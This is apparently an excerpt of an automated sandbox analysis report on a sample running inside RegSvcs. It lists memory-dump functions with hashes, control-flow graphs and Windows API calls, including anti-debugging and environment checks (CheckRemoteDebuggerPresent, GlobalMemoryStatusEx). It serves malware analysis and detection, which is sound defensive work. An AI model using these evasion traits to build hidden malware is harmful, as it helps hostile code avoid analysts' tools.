                                                                                  • Instruction ID: 79b314d7083f20ff72d8befdfac2e6d74651c1543e1b591b91e5ed0114d050af
                                                                                  • Opcode Fuzzy Hash: 58d530d7cb27ba2bd86b85bc209d748d418ea685cfe8bbc4034b4fe8ce867b9e
                                                                                  • Instruction Fuzzy Hash: 84626A34A002058FDB64DB68D594BADBBB2FF88310F548469E806EB395DB35ED46CF80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DB218 Relevance: .8, Instructions: 757COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7464e2d34d535eea9486fb0287e322f7fc299e0189497dbebfae6e79fb87b1f6
                                                                                  • Instruction ID: 3dc5e4ed6820aac637a5281b15c436f03232d915911c77498a91236371a3b192
                                                                                  • Opcode Fuzzy Hash: 7464e2d34d535eea9486fb0287e322f7fc299e0189497dbebfae6e79fb87b1f6
                                                                                  • Instruction Fuzzy Hash: 9F522BB0E102098BEF74DB6CD8807ADB7B2FB89310F618529E805EB395DB35DD419B91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DC168 Relevance: .6, Instructions: 632COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ef9e21e5d05e81252d499ac090ebd0d03ef863c643b7e42c6e1c62058719f9ec
                                                                                  • Instruction ID: 7b91d1c6f402742683f5d72e4e16337c72a42d38461fbe4b361d94a17013ba84
                                                                                  • Opcode Fuzzy Hash: ef9e21e5d05e81252d499ac090ebd0d03ef863c643b7e42c6e1c62058719f9ec
                                                                                  • Instruction Fuzzy Hash: 5F326134B102199FDF64DB68D990BAEB7B6FB88310F208529E805DB395DB35EC41CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D7D58 Relevance: .5, Instructions: 472COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 83633da7103819986e0079caad0b98c7150679d7a532f08d3fe9469669806930
                                                                                  • Instruction ID: 361395230da28f7d5a7a4491f7f98716e838f608a42353baf5e8bc8c0c24df97
                                                                                  • Opcode Fuzzy Hash: 83633da7103819986e0079caad0b98c7150679d7a532f08d3fe9469669806930
                                                                                  • Instruction Fuzzy Hash: 95028D30B016158FDB64EB68D8907AEB7B2FF84354F148569E806DB395DB35ED82CB80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00FDED48 Relevance: .3, Instructions: 331COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2760392146.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_fd0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fc37ac6265ca9917656773f232478b9fed6d0a5f144828c8ec3e9b8cf6f9e622
                                                                                  • Instruction ID: c5a8e207637ebaf14627dee623e889dc64941183876ae50b0ca08aea963763d2
                                                                                  • Opcode Fuzzy Hash: fc37ac6265ca9917656773f232478b9fed6d0a5f144828c8ec3e9b8cf6f9e622
                                                                                  • Instruction Fuzzy Hash: 39B1D231B042188BDB1CAB74985477FBBA7BFC9710B19846EE807DB385DE748C06A791
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DB208 Relevance: .3, Instructions: 289COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1d431ed858a8be2f22c10fb98bd1710851b9cd4a9aee4f25d4212248d4005145
                                                                                  • Instruction ID: ae97af47fbc8f80978282cab36f561427d02cc73eae9e7be207d4f57f703c0e1
                                                                                  • Opcode Fuzzy Hash: 1d431ed858a8be2f22c10fb98bd1710851b9cd4a9aee4f25d4212248d4005145
                                                                                  • Instruction Fuzzy Hash: DFA18274E012088BEF74DAACD8907AEBBA7FB89310F618425E806E73C1DB35DD419B51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00FD4AC8 Relevance: .3, Instructions: 266COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2760392146.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_fd0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1c361b172719555852975eab5bae824f4c9e114e08cf008f8178fb2f81ba9350
                                                                                  • Instruction ID: 5dc98396e83745a79eae831be43721e626ef4096df14cd8d1d075cd02f045abc
                                                                                  • Opcode Fuzzy Hash: 1c361b172719555852975eab5bae824f4c9e114e08cf008f8178fb2f81ba9350
                                                                                  • Instruction Fuzzy Hash: 45B14D70E002098FDB14DFA9C8817ADBBF3BF88714F18852AD815E7394EB75A845DB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065B3602 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 065B368E
                                                                                  • GetCurrentThread.KERNEL32 ref: 065B36CB
                                                                                  • GetCurrentProcess.KERNEL32 ref: 065B3708
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 065B3761
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2793824534.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65b0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID: Current$ProcessThread
                                                                                  • String ID:
                                                                                  • API String ID: 2063062207-0
                                                                                  • Opcode ID: 9ae6c64050d5bfb08fc517b8037f8cb36970caa10f81488aff79b2c45419fc21
                                                                                  • Instruction ID: 1eef62b55d2a179bbd71f22bb15e53f5b1dde8ae729d442eba10764e7b3ce761
                                                                                  • Opcode Fuzzy Hash: 9ae6c64050d5bfb08fc517b8037f8cb36970caa10f81488aff79b2c45419fc21
                                                                                  • Instruction Fuzzy Hash: 0C5144B090074A8FEB54DFA9C988BDEBBF1BF88314F24845DE409A7290D7789944CF65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065B3610 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 065B368E
                                                                                  • GetCurrentThread.KERNEL32 ref: 065B36CB
                                                                                  • GetCurrentProcess.KERNEL32 ref: 065B3708
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 065B3761
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2793824534.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65b0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID: Current$ProcessThread
                                                                                  • String ID:
                                                                                  • API String ID: 2063062207-0
                                                                                  • Opcode ID: 6ca48ebf8567016d6d2d77eb1aec5164b74ccf9854c6c0002ce4e35a07b67ace
                                                                                  • Instruction ID: b11094e958b95ed030dee7cea78b632df6bb5247219c638339dd8c2f7da99e08
                                                                                  • Opcode Fuzzy Hash: 6ca48ebf8567016d6d2d77eb1aec5164b74ccf9854c6c0002ce4e35a07b67ace
                                                                                  • Instruction Fuzzy Hash: A35143B09007498FEB54DFAAC988BDEBBF1BF88314F208059E409A7290DB749944CF65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065BBA18 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 841 65bba18-65bba37 843 65bba39-65bba46 call 65ba97c 841->843 844 65bba63-65bba67 841->844 851 65bba48 843->851 852 65bba5c 843->852 846 65bba7b-65bbabc 844->846 847 65bba69-65bba73 844->847 853 65bbac9-65bbad7 846->853 854 65bbabe-65bbac6 846->854 847->846 899 65bba4e call 65bbcb3 851->899 900 65bba4e call 65bbcc0 851->900 852->844 855 65bbafb-65bbafd 853->855 856 65bbad9-65bbade 853->856 854->853 861 65bbb00-65bbb07 855->861 858 65bbae9 856->858 859 65bbae0-65bbae7 call 65ba988 856->859 857 65bba54-65bba56 857->852 860 65bbb98-65bbc58 857->860 865 65bbaeb-65bbaf9 858->865 859->865 892 65bbc5a-65bbc5d 860->892 893 65bbc60-65bbc8b GetModuleHandleW 860->893 862 65bbb09-65bbb11 861->862 863 65bbb14-65bbb1b 861->863 862->863 866 65bbb28-65bbb31 call 65b41c4 863->866 867 65bbb1d-65bbb25 863->867 865->861 873 65bbb3e-65bbb43 866->873 874 65bbb33-65bbb3b 866->874 867->866 875 65bbb61-65bbb65 873->875 876 65bbb45-65bbb4c 873->876 874->873 897 65bbb68 call 65bbf70 875->897 898 65bbb68 call 65bbf80 875->898 876->875 878 65bbb4e-65bbb5e call 65ba7f8 call 65ba998 876->878 878->875 879 65bbb6b-65bbb6e 882 65bbb91-65bbb97 879->882 883 65bbb70-65bbb8e 879->883 883->882 892->893 894 65bbc8d-65bbc93 893->894 895 65bbc94-65bbca8 893->895 894->895 897->879 898->879 899->857 900->857
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 065BBC7E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2793824534.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65b0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: 4bb1f47880489065e524a14e826cc11f5c1e98f31d606f8343d4f54ea5d52b00
                                                                                  • Instruction ID: a78251d5f3ae1ab4113d31e130df11474e7e403da91f6bca445d9a8bccecb9f8
                                                                                  • Opcode Fuzzy Hash: 4bb1f47880489065e524a14e826cc11f5c1e98f31d606f8343d4f54ea5d52b00
                                                                                  • Instruction Fuzzy Hash: C0813570A00B058FE7A4DF29D48579ABBF1FF88204F008A2ED496D7A50DB75E945CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065BDFC5 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 901 65bdfc5-65bdfc7 902 65bdfc9-65bdff0 call 65bd41c 901->902 903 65bdffd-65be076 901->903 908 65bdff5-65bdff6 902->908 906 65be078-65be07e 903->906 907 65be081-65be088 903->907 906->907 909 65be08a-65be090 907->909 910 65be093-65be132 CreateWindowExW 907->910 909->910 912 65be13b-65be173 910->912 913 65be134-65be13a 910->913 917 65be180 912->917 918 65be175-65be178 912->918 913->912 919 65be181 917->919 918->917 919->919
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 065BE122
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2793824534.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65b0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: 8ec3da0c826605a8108b739f7a33a4fefcea613f459ad5da4e9a389d091de895
                                                                                  • Instruction ID: e6c13529871bf422dd48c3054c40551f5a59142a1accbb2ce0519f76d18d7c61
                                                                                  • Opcode Fuzzy Hash: 8ec3da0c826605a8108b739f7a33a4fefcea613f459ad5da4e9a389d091de895
                                                                                  • Instruction Fuzzy Hash: ED51C2B1C10249EFDF15CF99C884ADEBFB6BF49310F28816AE818AB221D7719855CF50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065BE004 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 920 65be004-65be076 922 65be078-65be07e 920->922 923 65be081-65be088 920->923 922->923 924 65be08a-65be090 923->924 925 65be093-65be0cb 923->925 924->925 926 65be0d3-65be132 CreateWindowExW 925->926 927 65be13b-65be173 926->927 928 65be134-65be13a 926->928 932 65be180 927->932 933 65be175-65be178 927->933 928->927 934 65be181 932->934 933->932 934->934
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 065BE122
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2793824534.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65b0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: 103bee42445fd5dad6ae657f3105fdf5a0ef7b8d02cf0a07a48917feade134ba
                                                                                  • Instruction ID: 1c32ebf4380e30d11eca7c610334427e86e3d69ad8fd5dea00bde677b2ed7261
                                                                                  • Opcode Fuzzy Hash: 103bee42445fd5dad6ae657f3105fdf5a0ef7b8d02cf0a07a48917feade134ba
                                                                                  • Instruction Fuzzy Hash: 3851B0B1D10349DFDB14CF9AC884ADEBBF5BF48750F24852AE819AB210D7759845CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065BE010 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 935 65be010-65be076 936 65be078-65be07e 935->936 937 65be081-65be088 935->937 936->937 938 65be08a-65be090 937->938 939 65be093-65be0cb 937->939 938->939 940 65be0d3-65be132 CreateWindowExW 939->940 941 65be13b-65be173 940->941 942 65be134-65be13a 940->942 946 65be180 941->946 947 65be175-65be178 941->947 942->941 948 65be181 946->948 947->946 948->948
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 065BE122
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2793824534.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65b0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: 9a97a33d0eb7167829b1baa84f0c23f4bee5f291f988c8bb0e9a4775e15200d4
                                                                                  • Instruction ID: 9dfa1bdef1c7d683e1ff1294e8b40a5b7abaf269c9fc179705edc43f32b01480
                                                                                  • Opcode Fuzzy Hash: 9a97a33d0eb7167829b1baa84f0c23f4bee5f291f988c8bb0e9a4775e15200d4
                                                                                  • Instruction Fuzzy Hash: 4741AFB1D10309DFDB14CF9AC884ADEBBB5BF88750F24852AE819AB210D7759845CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00FD70A0 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1055 fd70a0-fd712c CheckRemoteDebuggerPresent 1058 fd712e-fd7134 1055->1058 1059 fd7135-fd7170 1055->1059 1058->1059
                                                                                  APIs
                                                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00FD711F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2760392146.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_fd0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID: CheckDebuggerPresentRemote
                                                                                  • String ID:
                                                                                  • API String ID: 3662101638-0
                                                                                  • Opcode ID: d8894886d726b42c9ef5a985e1812eb9b050a22a51d1c4eaa3264b5c2585f894
                                                                                  • Instruction ID: 7e4ee161888b9613c6c58e3558b95539c90b3a7bad05206014a4a9b1349fe6f8
                                                                                  • Opcode Fuzzy Hash: d8894886d726b42c9ef5a985e1812eb9b050a22a51d1c4eaa3264b5c2585f894
                                                                                  • Instruction Fuzzy Hash: 7B2136B19002598FDB10DFAAD885BEEFBF5AF49320F14841AE858B7340D778A944CF61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065B3850 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1062 65b3850-65b3857 1063 65b3858-65b38ec DuplicateHandle 1062->1063 1064 65b38ee-65b38f4 1063->1064 1065 65b38f5-65b3912 1063->1065 1064->1065
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 065B38DF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2793824534.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65b0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: 351f686542a57f69a3690259d90f5d01f1a9c0200b34e8a08ab8461ffdb1e9ce
                                                                                  • Instruction ID: 1eab086da256cf4d9572ba0f4e410694b18a228ab846e3fda6607269ba8c47b3
                                                                                  • Opcode Fuzzy Hash: 351f686542a57f69a3690259d90f5d01f1a9c0200b34e8a08ab8461ffdb1e9ce
                                                                                  • Instruction Fuzzy Hash: FF2103B5C00309AFDB10CFAAD884ADEBBF8FB48320F10801AE914A3210D375A944CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065BA9A8 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1074 65ba9a8-65bbec0 1077 65bbec8-65bbef7 LoadLibraryExW 1074->1077 1078 65bbec2-65bbec5 1074->1078 1079 65bbef9-65bbeff 1077->1079 1080 65bbf00-65bbf1d 1077->1080 1078->1077 1079->1080
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,065BBCF9,00000800,00000000,00000000), ref: 065BBEEA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2793824534.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65b0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: d71f75b0bf71bfcc834565508cca81cf5b100c0491845b482f17fcb572e2c463
                                                                                  • Instruction ID: 5563180b474edc2d4cd491ad94ac680a9e4ebb6b268c6210ea8aff055d542c93
                                                                                  • Opcode Fuzzy Hash: d71f75b0bf71bfcc834565508cca81cf5b100c0491845b482f17fcb572e2c463
                                                                                  • Instruction Fuzzy Hash: 5F2157B6C043098FDB10CFAAC844BEEBBF5BB88610F14846ED554AB310C775A505CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065B3858 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1083 65b3858-65b38ec DuplicateHandle 1084 65b38ee-65b38f4 1083->1084 1085 65b38f5-65b3912 1083->1085 1084->1085
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 065B38DF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2793824534.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65b0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: cdbece299a7051c8a61f814b7f196ba0c2b69e2f0f982db871bc61a8f767fdcc
                                                                                  • Instruction ID: 5eae691264e595d672c8baf3238e79115acf3360206e3b2b785362a164365b49
                                                                                  • Opcode Fuzzy Hash: cdbece299a7051c8a61f814b7f196ba0c2b69e2f0f982db871bc61a8f767fdcc
                                                                                  • Instruction Fuzzy Hash: F321E4B5D003099FDB10CFAAD884ADEBBF9FB48710F14841AE914A3350D375A944CF65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00FDF29F Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 00FDF31F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2760392146.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_fd0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID: GlobalMemoryStatus
                                                                                  • String ID:
                                                                                  • API String ID: 1890195054-0
                                                                                  • Opcode ID: 7a0b3dd582d89083a39e0e47cdcc7753d9aa9b812df5f9fd6c0201bed2255ea3
                                                                                  • Instruction ID: 6aabcbb784aff516a707f18d5394316b1c04a0eb6adde4963295d62957a2b200
                                                                                  • Opcode Fuzzy Hash: 7a0b3dd582d89083a39e0e47cdcc7753d9aa9b812df5f9fd6c0201bed2255ea3
                                                                                  • Instruction Fuzzy Hash: C3212FB1C0025A8FDB10DFAAC544BDEBBF5AF48220F15812AE818A7241D378A905CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065BA9C0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,065BBCF9,00000800,00000000,00000000), ref: 065BBEEA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2793824534.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65b0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: e25d8f3f34011e46a1994a46e77109d4e3cd1d45379ed6d510563bfd263a29b0
                                                                                  • Instruction ID: 43927ee91f9f3c1d7f39abe8f5b703c01abcb4802753f3b8105958139e869025
                                                                                  • Opcode Fuzzy Hash: e25d8f3f34011e46a1994a46e77109d4e3cd1d45379ed6d510563bfd263a29b0
                                                                                  • Instruction Fuzzy Hash: F11103B6C003099FDB10DF9AC844BEEFBF9FB88610F10842AD519A7210C7B9A545CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065BBE7B Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,065BBCF9,00000800,00000000,00000000), ref: 065BBEEA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2793824534.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65b0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 1fb120d9304e45ce84fd18bef8ef5554071b8babe7ebbfa7fee9f710ae48dece
                                                                                  • Instruction ID: 3cdf66972c6e749e5227b8b1ce9aeb1298a87bed8b9292405e4464bd750c8efb
                                                                                  • Opcode Fuzzy Hash: 1fb120d9304e45ce84fd18bef8ef5554071b8babe7ebbfa7fee9f710ae48dece
                                                                                  • Instruction Fuzzy Hash: C411D0B6D002098FDB10CFAAD844AEEBBF5FB88710F14842AD519A7610C7B5A545CFA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00FDF2B8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 00FDF31F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2760392146.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_fd0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID: GlobalMemoryStatus
                                                                                  • String ID:
                                                                                  • API String ID: 1890195054-0
                                                                                  • Opcode ID: 994edf3a2f283f49bc46519fe836b860cd827deb3ceaf577b4536fc4f5473f86
                                                                                  • Instruction ID: 15a3c8dd4ff15f9aa22a64081375a953f9f9534fffdddd59a4472b072599fae2
                                                                                  • Opcode Fuzzy Hash: 994edf3a2f283f49bc46519fe836b860cd827deb3ceaf577b4536fc4f5473f86
                                                                                  • Instruction Fuzzy Hash: 2211EFB1C0065A9BDB10DFAAC444BDEFBF5BF48720F15812AD818A7241D778A944CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065BBC18 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 065BBC7E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2793824534.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65b0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: 4209359c6439b88f3a91147e0cbe5e748a826d8ca6aa7deddcd384870455ed4d
                                                                                  • Instruction ID: 721f2b2db5c038dc9e266adfdddb24f7ea2527d9ead7dc8ca06893add336f1a8
                                                                                  • Opcode Fuzzy Hash: 4209359c6439b88f3a91147e0cbe5e748a826d8ca6aa7deddcd384870455ed4d
                                                                                  • Instruction Fuzzy Hash: 5611E0B5C0034A8FDB20DF9AC844BDEFBF5FB88624F10841AD419A7610C7B9A545CFA5
                                                                                  Uniqueness

